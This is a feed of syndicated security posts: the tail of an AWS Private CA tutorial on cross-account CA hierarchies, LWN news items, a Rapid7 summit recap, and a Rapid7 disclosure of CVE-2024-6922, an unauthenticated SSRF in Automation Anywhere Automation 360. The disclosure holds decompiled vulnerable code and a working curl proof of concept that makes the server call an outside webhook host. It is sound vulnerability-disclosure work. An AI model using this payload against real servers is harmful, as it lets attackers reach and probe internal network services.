  1. Remaining within the Subordinate CA account, get the CSR of the subordinate CA for signing. In the details page of the subordinate CA, open the Install subordinate CA certificate page by choosing Actions and selecting Install CA certificate, the CSR will be displayed when you select External private CA as the CA type. Export this to a file called sub-ca.csr on your local machine.

    Although the subordinate CA was managed by AWS Private CA, it will be considered as an external private CA because it’s in a different account and a different Region from the root CA.

    Figure 7: Details page of Install subordinate CA certificate

    Figure 7: Details page of Install subordinate CA certificate

  2. In the example scenario, you want the subordinate CA to only issue certificates directly to end-entities, so its certificate must be signed using the SubordinateCACertificate_PathLen0/V1 template on the root CA. This encodes a limitation into the CA that declares that the subordinate CA cannot sign a CSR for another CA.

    To do this, switch to the Root CA account and use CloudShell to run commands with the AWS CLI. Recreate the file sub-ca.csr using a text editor within CloudShell, and then use the following command to issue subordinate CA certificate. Replace the root-ca-arn with the ARN of the root CA you created previously:

    aws acm-pca issue-certificate --region us-west-2 \
  --certificate-authority-arn <root-ca-arn> \
  --csr file://sub-ca.csr \
  --signing-algorithm SHA256WITHRSA \
  --template-arn arn:aws:acm-pca:::template/SubordinateCACertificate_PathLen0/V1 \
 --validity Value=5,Type=YEARS

    The output looks like the following. Note the CertificateArn that is returned, because it will be used as <sub-ca-certificate-arn> in the following steps:

    {
    "CertificateArn": "<sub-ca-certificate-arn>"
}

  3. Remaining in the Root CA account, export the subordinate CA’s certificate and certificate chain. Store the text that is returned from the CLI in a file on your local machine for later use in the Subordinate CA account. Replace the <root-ca-arn> and <sub-ca-certificate-arn> with the actual values.
    1. Export the subordinate CA’s certificate: 
      aws acm-pca get-certificate --region us-west-2 --certificate-authority-arn <root-ca-arn> --certificate-arn <sub-ca-certificate-arn> --query “Certificate” --output text

    2. Export the subordinate CA’s certificate chain: 
      aws acm-pca get-certificate --region us-west-2 --certificate-authority-arn <root-ca-arn> --certificate-arn <sub-ca-certificate-arn> --query “CertificateChain” --output text

  4. Switching back to the Subordinate CA account, import the subordinate CA’s certificate and root certificate chain to activate the subordinate CA. On the install subordinate CA certificate, choose Actions and select Install CA certificate.
    1. Use the exported certificate from the previous step to fill in the certificate body.
    2. Use the exported certificate chain from the previous step to fill in the certificate chain.
    3. Choose Confirm and install.

      Figure 8: Import certificate and certificate chain to the subordinate CA

      Figure 8: Import certificate and certificate chain to the subordinate CA

  5. Now, the subordinate CA is in Active status.

    Figure 9: Subordinate CA in active status

    Figure 9: Subordinate CA in active status

To validate the end-entity certificate

Now that you have established a two-level CA hierarchy, you can issue an end-entity certificate and deploy a web application in the Subordinate CA account. Use a web browser to view the web application and validate the CA hierarchy.

  1. Go to the AWS Certificate Manager console of the subordinate CA account and request a private certificate. In the Certificate authority details section, select the subordinate CA that was previously built.

    Figure 10: Issue certificate using subordinate CA in ACM

    Figure 10: Issue certificate using subordinate CA in ACM

  2. Deploy a sample web application behind an Application Load Balancer (ALB) in the Subordinate CA account. This sample web application uses a feature of the ALB listener that returns a fixed response without needing to configure backend compute resources. Configure the listener to use the certificate issued in the previous step to handle HTTPS traffic.

    Figure 11: Details of the ALB

    Figure 11: Details of the ALB

  3. Check the hierarchical relationship of CAs by visiting the web application and viewing the certificate details in your web browser.

    Figure 12: Certificate details in the web browser

    Figure 12: Certificate details in the web browser

From this image, you can see that the certificate trust chain of the CA hierarchy has been established successfully. The end-entity certificate (on the left) was issued by the CA Example Corp SG L2 CA, which you can identify from its Issuer Name. In the middle is the certificate of Example Corp SG L2 CA, and its issuer is Example Corp Root CA. You can see the certificate of Example Corp Root CA on the right, which is the root CA, and its Issuer Name is itself. When the subject and issuer attributes match, this is indicative of a root CA.

Conclusion

In this post, we showed you how to build a CA hierarchy solution across AWS accounts and Regions, using AWS Private CA. Using this as a guide, you can build a complex CA hierarchy to help meet your global business security and compliance requirements.

Read more

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, start a new thread on the AWS Private Certificate Authority re:Post or contact AWS Support.

Jiaqing Xue

Jiaqing Xue
Jiaqing is a Solutions Architect at AWS. He focuses on helping customers build more secure, modern applications on AWS. In his spare time, he enjoys coding.

Patrick Palmer

Patrick Palmer
Patrick is a Principal Security Specialist Solutions Architect. He helps customers around the world use AWS services in a secure manner and specializes in cryptography. When not working, he enjoys spending time with his growing family and playing video games.

Xinran Liu

Xinran Liu
Xinran is a Solutions Architect at AWS. Edge computing and DevOps are his areas of interest. He has 14 years of experience leading large-scale engineering projects with expertise in designing and managing both on-premises and cloud-based infrastructures.

Matt Yu

Matt Yu
Matt is a Security Solutions Architect at AWS, responsible for providing customers with end-to-end cloud security solutions. He has extensive experience in identity and access management, threat detection, and cloud security protection.

[$] May the FOLL_FORCE not be with you

Post Syndicated from corbet original https://lwn.net/Articles/983169/

One of the simplest hardening concepts to understand is that memory should
never be both writable and executable, otherwise an attacker can use it to
load and run arbitrary code. That rule is generally followed in Linux
systems, but there is a glaring loophole that is exploitable from user
space to inject code into a running process. Attackers have duly exploited
it. A new effort to close the hole ran into trouble early in the merge
window, but a solution may yet be found in time for the 6.11 kernel
release.

Security updates for Friday

Post Syndicated from daroc original https://lwn.net/Articles/983523/

Security updates have been issued by AlmaLinux (linux-firmware and squid), Debian (bind9), Fedora (kubernetes, thunderbird, and tinyproxy), Oracle (containernetworking-plugins, cups, edk2, httpd, httpd:2.4, kernel, kernel-container, libreoffice, libuv, libvirt, python3, and runc), Red Hat (freeradius:3.0, httpd, and squid), and SUSE (giflib and python-dnspython).

Key Takeaways From The Take Command Summit:Command Your Cloud

Post Syndicated from Emma Burdett original https://blog.rapid7.com/2024/07/26/key-takeaways-from-the-take-command-summit-command-your-cloud/

Key Takeaways From The Take Command Summit:Command Your Cloud

The Cloud security landscape is constantly changing. During the “Command Your Cloud” session at the Rapid7 Take Command Summit, industry experts Ryan Blanchard, Jeffrey Gardner and Devin Krugly shared vital strategies for staying ahead of that constant change.

Effective cloud security requires a blend of proactive measures, prioritization based on real-world threats, and strategic automation. In fact, 35% of our post event survey respondents were unsure about the last time their organization experienced a security incident related to their cloud environment. This highlights a potential lack of visibility and communication regarding cloud security incidents within organizations.

Key Takeaways:

  1. Embrace Democratized Access with Caution: The shift to cloud environments has democratized access and authority within organizations, leading to a broader range of individuals who can provision and manage resources. However, this increased access can result in diverse builds and rapid changes, complicating visibility and control. As Jeff Gardner highlighted, “Excess permissions and misconfigurations are natural outcomes of rapid cloud adoption, but they make you an attractive target for attackers.”
  2. Prioritize People and Processes Before Technology: Effective cloud security starts with people and processes. Gardner emphasized the importance of securing buy-in from higher-ups and modeling good security behavior. “Leadership comes from the top.” he said,”…find a champion on the dev team interested in security and build on that.” Additionally, fostering a no-blame culture can encourage teams to learn from mistakes and continuously improve.
  3. Implement Layered Risk Management: Devin Gregory underscored the necessity of a layered risk management approach. This includes understanding business criticality, public accessibility, attack paths, identity-related risks, misconfigurations, and vulnerabilities. He said, “Understanding the data flows and the business requirements helps prioritize what needs to be secured first.”

“One of the things that has really come into focus for security teams is building a collaborative and empathic environment. It’s about including the security and the IT team and the infrastructure team right in the decisions.” – Devin Krugly, Practice Advisor – VRM, Rapid7

Interested in learning more? Watch the full session to dive deeper into these strategies and enhance your cloud security posture.

CVE-2024-6922: Automation Anywhere Automation 360 Server-Side Request Forgery

Post Syndicated from Ryan Emmons original https://blog.rapid7.com/2024/07/26/cve-2024-6922-automation-anywhere-automation-360-server-side-request-forgery/

CVE-2024-6922: Automation Anywhere Automation 360 Server-Side Request Forgery

Automation 360 Robotic Process Automation suite v21-v32 is vulnerable to unauthenticated Server-Side Request Forgery (SSRF). SSRF occurs when the server can be induced to perform arbitrary requests on behalf of an attacker. An attacker with unauthenticated access to the Automation 360 Control Room HTTPS service (port 443) or HTTP service (port 80) can trigger arbitrary web requests from the server.

Product Description

Automation Anywhere Automation 360 is a leading Robotic Process Automation suite, used by many private-sector businesses and government agencies. Its primary purpose is low-code automated workflow creation and task orchestration. A primary “Control Room” server communicates with client agents, and those client agents execute automated “bot” workflows. These workflows leverage extensible feature modules that facilitate activities like automated web browsing, SQL database interop, and execution of various types of scripts and compiled binaries via the client agent.

This security research project was specifically focused on the unauthenticated attack surface of the Control Room server. Based on attack surface reconnaissance, approximately 3,500 Control Room servers are exposed to the public internet.

Credit

This issue was discovered by Ryan Emmons, Lead Security Researcher at Rapid7, and it is being disclosed in accordance with Rapid7’s vulnerability disclosure policy. Rapid7 is grateful to Automation Anywhere for their prompt assistance evaluating and coordinating a disclosure for this issue.

Vendor Statement

Automation Anywhere wants to thank Rapid7 for the discovery of an issue, that is now reported as CVE-2024-6922 in Automation 360 v.32 and earlier. We have notified our customers of the mitigation.

Impact

These requests can be used to target internal network services that are not otherwise reachable. Blind SSRF can be weaponized to discover and exploit common internal enterprise systems via SSRF canaries and timing-based port scans. Furthermore, the vulnerability also makes localhost-only system web services reachable to attackers. For example, unauthenticated attackers can direct Automation 360 to perform arbitrary POST web requests to the back end web services behind Traefik, the Elastic API, and internal Windows web APIs. These capabilities subvert expectations of what should and should not be publicly reachable for unauthenticated users.

Exploitation

The spring/authn-context-global-security-urls.xml file within kernel.jar contains Spring security filter definitions for the front-facing Automation 360 Control Room web application. In the XML, the URL pattern /v1/proxy/test is set to allow unauthenticated access:

[..snip..]
        <!-- proxy -->
        <sec:intercept-url pattern="/v1/proxy/test" access="permitAll()"/>
[..snip..]

The testSDSProxyCredentials function that implements that API endpoint is found in com/automationanywhere/proxy/service/impl/SDSProxyCredentialServiceImpl.java. It expects a JSON saasUrl value in the POST request body, which it then uses in a format string for a new POST request to a “cloud control room”. This decompiled code is shown below, with number identifier comments added. At [1], tainted data is formatted into the URL string. At [2], an HttpURLConnection is opened to the URL, then the response data stream is fetched at [3]. The response is not returned to the attacker.

public void testSDSProxyCredentials(
    final SDSProxyCredTestRequest proxyCredsToTest) {
  if (proxyCredsToTest.getSaasUrl().isEmpty()) {
    throw new IllegalArgumentException(
        "Please provide a valid SaaS system url.");
  }
  final String saasUrl = String.format(
      "https://%s/v1/authentication", proxyCredsToTest.getSaasUrl()); // [1]
  HttpURLConnection httpURLConnection = null;
  final String proxyUsername = proxyCredsToTest.getUsername();
  final String proxyPassword = proxyCredsToTest.getPassword();
  final boolean proxyCredsPassed = !proxyUsername.isEmpty();
  String CLOUD_CR_CONNECTION_FAILED =
      "Unable to connect to cloud control room.";
  try {
    try {
      httpURLConnection = ProxyUtil.getConnection(saasUrl); // [2]
      httpURLConnection.setDoOutput(true);
      httpURLConnection.setRequestMethod("POST");
      httpURLConnection.setRequestProperty("Content-Type", "application/json");
    } catch (final Exception e) {
      this.proxyAuditService.addAuditLog(
          ProxyAuditValue.PROXY_CONNECTIVITY_TEST_FAILURE,
          CLOUD_CR_CONNECTION_FAILED);

      throw new RuntimeException(e);
    }
    if (proxyCredsPassed) {
      ProxyUtil.setAuthenticator(
          saasUrl, httpURLConnection, proxyUsername, proxyPassword);
    }

    try {
      final DataOutputStream wr =
          new DataOutputStream(httpURLConnection.getOutputStream()); // [3]
      try {
        wr.writeBytes("");
        wr.flush();

        final int responseCode = httpURLConnection.getResponseCode();
        if (responseCode != 400) {
          SDSProxyCredentialServiceImpl.logger.error(responseCode);
          InputStream inputStream;
          try {
            inputStream = httpURLConnection.getInputStream();
          } catch (final IOException ioe) {
            inputStream = httpURLConnection.getErrorStream();
          }
          final BufferedReader in = new BufferedReader(
              new InputStreamReader(inputStream, StandardCharsets.UTF_8));

          try {
            final String errorMessage =
                in.lines().collect(Collectors.joining("\n"));
            CLOUD_CR_CONNECTION_FAILED =
                this.getResponseMessageFromError(errorMessage);
            SDSProxyCredentialServiceImpl.logger.error(
                CLOUD_CR_CONNECTION_FAILED + " error code: {} msg: {}",

                (Object) responseCode, (Object) errorMessage);

            this.proxyAuditService.addAuditLog(
                ProxyAuditValue.PROXY_CONNECTIVITY_TEST_FAILURE,
                CLOUD_CR_CONNECTION_FAILED);

            throw new IllegalStateException(CLOUD_CR_CONNECTION_FAILED);
          } catch (final Throwable t) {
            try {
              in.close();
            } catch (final Throwable exception) {
              t.addSuppressed(exception);
            }
            throw t;
          }
        }
        wr.close();
      } catch (final Throwable t2) {
        try {
          wr.close();
        } catch (final Throwable exception2) {
          t2.addSuppressed(exception2);
        } throw t2;
      }
    } catch (final IOException e2) {
      CLOUD_CR_CONNECTION_FAILED =
          this.getResponseMessageFromError(e2.getMessage());
      SDSProxyCredentialServiceImpl.logger.error(
          CLOUD_CR_CONNECTION_FAILED, e2);
      this.proxyAuditService.addAuditLog(
          ProxyAuditValue.PROXY_CONNECTIVITY_TEST_FAILURE, e2.getMessage());
      throw new IllegalStateException(CLOUD_CR_CONNECTION_FAILED);
    }
    this.proxyAuditService.addAuditLog(
        ProxyAuditValue.PROXY_CONNECTIVITY_TEST_SUCCESS, "");
  } finally {
    httpURLConnection.disconnect();
  }
}

As outlined in the code, the attacker-controlled host name has the HTTPS scheme prepended and the /v1/authentication path appended. However, a hash symbol can be used to escape the existing path, and the attacker can specify an arbitrary basic authentication string, port, and set of URL parameters for the resulting POST request. The unauthenticated request is demonstrated below, targeting a webhook.site URL for easy access logging.

$ curl -vvv 'http://192.166.15.138/v1/proxy/test' -d '{"saasUrl":"www.webhook.site/fa6f3803-7bd4-4fdb-b2ac-103fe10aa56f?param=one#"}'
*   Trying 192.166.15.138:80...
* Connected to 192.166.15.138 (192.166.15.138) port 80 (#0)
> POST /v1/proxy/test HTTP/1.1
> Host: 192.166.15.138
> User-Agent: curl/7.81.0
> Accept: */*
> Content-Length: 72
> Content-Type: application/x-www-form-urlencoded
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 400 Bad Request
< Cache-Control: no-cache, no-store, max-age=0, must-revalidate
< Content-Security-Policy: default-src 'self' http://127.0.0.1:22113/ https://cdn.pendo.io/ https://app.pendo.io/ https://data.pendo.io/ https://pendo-static-5673999629942784.storage.googleapis.com/ https://pendo-io-static.storage.googleapis.com/  https://iph.zoominsoftware.io/ https://automationanywhere-be-dev.zoominsoftware.io/ https://automationanywhere-staging.zoominsoftware.io https://docs.automationanywhere.com/ https://automationanywhere-be-prod.automationanywhere.com ; frame-src 'self' https://*.youtube.com/ https://*.wistia.net/ https://*.wistia.com https://*.zoominsoftware.io https://*.automationanywhere.com/ https://cdn.pendo.io/ https://app.pendo.io/ https://data.pendo.io/ https://pendo-static-5673999629942784.storage.googleapis.com/ https://pendo-io-static.storage.googleapis.com/
< Content-Type: application/json
< Date: Thu, 23 May 2024 00:05:20 GMT
< Expires: 0
< Pragma: no-cache
< Referrer-Policy: same-origin
< Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
< X-Content-Type-Options: nosniff
< X-Frame-Options: SAMEORIGIN
< X-Xss-Protection: 1; mode=block
< Transfer-Encoding: chunked
< 
* Connection #0 to host 192.166.15.138 left intact
{"message":"Unable to connect to cloud control room."}

The listening webhook.site HTTPS server then receives a POST request from the Automation 360 server:

CVE-2024-6922: Automation Anywhere Automation 360 Server-Side Request Forgery

Remediation

Automation Anywhere indicated to Rapid7 that this issue had been fixed in version 33 of the product even before Rapid7 reported the issue to them. The vendor listed the affected versions as v21 to v32.

Automation Anywhere has indicated to Rapid7 that per the release notes, this issue has been fixed in Automation 360 v.33 that was available on June 17, 2024. The vendor reinforced that customers on older versions should upgrade to Automation 360 v.33 to get the vulnerability resolved. More information is available on the A360 Release Notes portal at https://docs.automationanywhere.com/bundle/enterprise-v2019/page/v33-release-automation-workspace.html#d468396e1627

Rapid7 Customers

InsightVM and Nexpose customers will be able to assess their exposure to CVE-2024-6922 with a vulnerability check expected to be available in today’s (Friday, July 26) content release.

Disclosure Timeline

June 17, 2024: Rapid7 makes initial contact with Automation Anywhere
June 21, 2024: Automation Anywhere confirms contact mechanism for vulnerability disclosure
June 24, 2024: Rapid7 provides Automation Anywhere with technical details.
July 1, 2024: Automation Anywhere confirmed the Rapid7 findings and found that the vulnerable code had coincidentally been removed from v33 prior to Rapid7 outreach.
July 2, 2024: Rapid7 requests additional information on affected product versions and remediation guidance
July 18, 2024: Automation Anywhere confirms affected product versions and shares plan to disclose the vulnerability to customers via release notes as of July 26, 2024. Rapid7 reserves CVE-2024-6922.
July 25, 2024: Rapid7 and Automation Anywhere confirm remediation guidance and coordinated disclosure timing.
July 26, 2024: This disclosure.